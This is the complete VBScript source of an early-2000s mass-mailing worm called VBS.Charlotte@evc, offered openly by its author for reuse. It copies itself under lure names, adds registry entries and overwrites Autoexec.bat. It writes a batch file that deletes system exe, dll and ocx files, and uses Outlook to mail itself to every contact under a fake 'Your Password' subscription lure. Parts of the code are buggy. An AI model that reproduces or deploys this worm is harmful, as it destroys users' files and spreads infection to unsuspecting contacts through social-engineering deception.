' **************************************************************** '
' Name: VBS.Charlotte@evc      Date: 15/sept/2002     Time: 2:54pm '
'                                                                  '
'        VBS.Charlotte@evc (lame110a.vbs) writen in the            '
' **************************************************************** '
rem A=Industry N=110a D=8,s,02 T=254

'if you rip this source please give me a mention :o)

On Error Resume Next

Dim ANDT
Dim ANDsT
Dim Cbat
Dim A01
Dim objFSO, objTS
Dim delFSO, delbat
Dim xx
Dim x
Dim y
Dim z
Dim zz
Dim fso
Dim ws
Dim OApp
Dim Mapi
Dim AddListEntry
Dim msg

'all the usual crap such as copying files
Set ANDst = CreateObject( "Scripting.FileSystemObject" )
ANDsT.CopyFile WScript.ScriptFullName, ANDsT.BuildPath(ANDsT.GetSpecialFolder(1), "110a.vbs" )

Set ANDT = CreateObject( "WScript.Shell" )
ANDT.RegWrite "HKEY_LOCAL_MACHINE\Software\infections\VBS.110a\" & "110a.vbs", ANDsT.BuildPath(ANDsT.GetSpecialFolder(1), "110a.VBS" )

Set Cbat = CreateObject( "Scripting.FileSystemObject")
Cbat.CopyFile WScript.ScriptFullName, Cbat.BuildPath(Cbat.GetSpecialFolder(0), "CNNtoday.html.vbs" )

Set A01 = CreateObject( "Scripting.FileSystemObject" )
A01.CopyFile WScript.ScriptFullName, A01.BuildPath(A01.GetSpecialFolder(1), "CNNtoday.html.vbs" )

Set ATT = CreateObject( "Scripting.FileSystemObject" )
ATT.CopyFile WScript.ScriptFullName, ATT.BuildPath(ATT.GetSpecialFolder(1), "Subscription.zip.vbs" )

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objTS = objFSO.CreateTextFile("C:\Autoexec.bat")

'This is Charlotte...
objTS.WriteLine("@echo off")
objTS.WriteLine("echo ~ ")
objTS.WriteLine("echo             :AMMMMMMMMMMMMMMMMMMA:                                          ")
objTS.WriteLine("echo           :AMMMMMMMMMHHHHHMMMMMMMMA:                                        ")
objTS.WriteLine("echo          :AMHMMMMHHMHIHHIMMMHMMMMHHA:                                       ")
objTS.WriteLine("echo         :AM'MMMMMMHHIHHHIMMMMMIMMHHHH:                                      ")
objTS.WriteLine("echo         AM:IMMMMMHHIHIHHHIMMHHHHHHHHHH                                      ")
objTS.WriteLine("echo        AMIIHMMMMMHIHHHIHHIHHHHHHHHHHHH:                                     ")
objTS.WriteLine("echo        MMIHHMMMMMHHIHHHIHHHHHHHHHHHHHHH                                     ")
objTS.WriteLine("echo       AMMMMMHHHHHHI;;;;;;;IHHHI;;IHHHHH                                     ")
objTS.WriteLine("echo       MMMMHIIII;':AMMMMA        ,'', HH                                     ")
objTS.WriteLine("echo       MMMMHII;  AW'''''         ::   HH                                     ")
objTS.WriteLine("echo      IHHIHIII;:'' ,GFMF'       'MM': IH                                     ")
objTS.WriteLine("echo     IHHHIHII;;::         ::;:        ;H                                     ")
objTS.WriteLine("echo     AHHHHHII;;;:: :     : :  :       ;H                                     ")
objTS.WriteLine("echo     IHHIIHI:';;;:: ;   ; ; ,  ,      IH                                     ")
objTS.WriteLine("echo     IHHIIHH:';;;: ;   ;: ':'::' ';   IH                                     ")
objTS.WriteLine("echo     IHHIIHI:';;: ::: ;    ,,,,    '  HH                                     ")
objTS.WriteLine("echo    :IHHHIHHMMA;:::    ';;''''''';   AMI                                     ")
objTS.WriteLine("echo    ;IHHHHIIHMM;: : :   ;;',,,,';    HHI                                     ")
objTS.WriteLine("echo    IIHHMMHHIHHM;::       '''''     AMHI                                     ")
objTS.WriteLine("echo    IIHHMMHMHHIIIM;::              AMMHI                                     ")
objTS.WriteLine("echo    IHHHMMHMHMHHHIHI;::          :AMMMHI                                     ")
objTS.WriteLine("echo    IHHHMMMMHMMHHHII;;;;::   :,;; MMMHHI                                     ")
objTS.WriteLine("echo    IHHHMMHHHHMMHHHI;:';;;;;;'    MMMIH'                                     ")
objTS.WriteLine("echo    ;IHHMMHMMMMHF'HHII            MMMHH                                      ")
objTS.WriteLine("echo     IHHMMHV;;::    HHII;:      : MMHHI                                      ")
objTS.WriteLine("echo     IHHMV;;:::      HHII;:   : : MMHI;                                      ")
objTS.WriteLine("echo     IHMV;;:: :       'HII;:   :: MMI;                                       ")
objTS.WriteLine("echo    :IHV;::  :          'HI:   :: MM;                                        ")
objTS.WriteLine("echo    IHV;::  :            HA;:   : #'                                         ")
objTS.WriteLine("echo    IV;:: :   :          'II;:    ;                                          ")
objTS.WriteLine("echo   :IH;::  :              III;:    ;                                         ")
objTS.WriteLine("echo   IH;;:::  :              ;;;I:   ;                                         ")
objTS.WriteLine("echo   HV;::: :   :            ';;;HI:  '                                        ")
objTS.WriteLine("echo  ;M;;:::: :                ';;;HI:  '                                       ")
objTS.WriteLine("echo  MH;;::::           :        ';;HI:  ;                                      ")
objTS.WriteLine("echo IM;;;::: :         :';         ';I'I: ;                                     ")
objTS.WriteLine("echo M;;;::: :   :      :;;,:          '  : '                                    ")
objTS.WriteLine("echo ;;::::    :       ::''                : ':                                  ")
objTS.WriteLine("echo ;;:::   :         :                     ': :                                ")
objTS.WriteLine("echo :;;::  :          ::                       ':'                              ")
objTS.WriteLine("echo ;;::  :  :        :                          '':                            ")
objTS.WriteLine("echo ;;:: :            :                           :;,:                          ")
objTS.WriteLine("echo ;;::  :          ::                           ;:::,:                        ")
objTS.WriteLine("echo :;;::    :        :                            ;;:::;':                     ")
objTS.WriteLine("echo ;;:: : :         '::       : :                  ;::::;;:,                   ")
objTS.WriteLine("echo ;::   :         ';;;:     : :,                   :::::'::;                  ")
objTS.WriteLine("echo ;:: :          :M;;:       : :,'                  :::: ::'                  ")
objTS.WriteLine("echo ;:     :        ''::        : ::'                  ;:' ;:                   ")
objTS.WriteLine("echo ;:   :           '':         : ::'                 :'  :'                   ")
objTS.WriteLine("echo :: :: :           ',           :::;:              :'  :;                    ")
objTS.WriteLine("echo :   ::             ':          : :::;:          ::'  :;                     ")
objTS.WriteLine("echo ::  ;               :          : ::::;::,,::;;I'   ;;                       ")
objTS.WriteLine("echo ;;:;: : :           :          :::::::: '''' I::;''                         ")
objTS.WriteLine("echo       :========================================:                            ")
objTS.WriteLine("echo       :********** VBS.Charlotte@evc ***********:                            ")
objTS.WriteLine("echo       :========================================:                            ")
objTS.WriteLine("echo       :                                        :                            ")
objTS.WriteLine("echo       :      Date Created: 15/sept/2002        :                            ")
objTS.WriteLine("echo       :   Also known as VBS.110a(lame) worm    :                            ")
objTS.WriteLine("echo       :...Its Just a vibe for power and fame...:                            ")
objTS.WriteLine("echo       '========================================'                            ")
objTS.WriteLine("Pause")
objTS.WriteLine("Start C:\Windows\del.bat")
objTS.Close

'just a pop up to show that its still infected
If month(now) = 9 and day(now) = 15 then
Msgbox "Its Just a vibe for power and fame",64,"VBS.Charlotte@evc"
End If

'Create Distructive Batch file (thank you microsoft)
Set ANDTbat = CreateObject( "WScript.Shell" )
ANDTbat.RegWrite "HKEY_LOCAL_MACHINE\Software\batch" & "110a.bat", delbat.BuildPath(delbat.GetSpecialFolder(1), "110a.bat" )
Set delFSO = CreateObject("Scripting.FileSystemObject")
Set delbat = delFSO.CreateTextFile("C:\Windows\Del.bat")
delbat.WriteLine("@echo off")
delbat.WriteLine("cd C:\Windows\System\dlls\")
delbat.WriteLine("del *.exe")
delbat.WriteLine("del *.dll")
delbat.WriteLine("del *.ocx")
delbat.WriteLine("echo All Done")
delbat.WriteLine("del *.bat")
delbat.WriteLine("cd C:\Windows del.bat")
delbat.close

'attempt to send via outlook
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
AddlistCount = AddList.AddressEntries.Count
For AddListCount = 1 To AddlistCount
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set blank_shit1 = nuthing
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your Password"
msg.Body = "Thank you for your subscription your password and user name is attatched."
msg.Attachments.Add FileSystemObject.GetSpecialFolder(0) & "Subscription.zip.vbs"
msg.DeleteAfterSubmit = True
Set blank_shit2 = nuthing
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if

'Write stuff to exe files
'This wont even work LOL dunno y its here :\
xx = App.Path & "\" & App.EXEName & ".exe"
x = App.Path & App.EXEName & ".exe"
y = "c:\WINDOWS\msnicon.EXE"
z = "c:\WINDOWS\netstat.EXE"
zz = "c:\WINDOWS\Telnet.exe"
FileCopy x, y
FileCopy x, z
FileCopy x, zz
FileCopy xx, y
FileCopy xx, z
FileCopy xx, zz
'Just like to show my support to Gigabyte
'whos work has inspired many to create bigger and better
'projects. thanx... INDUSTRY


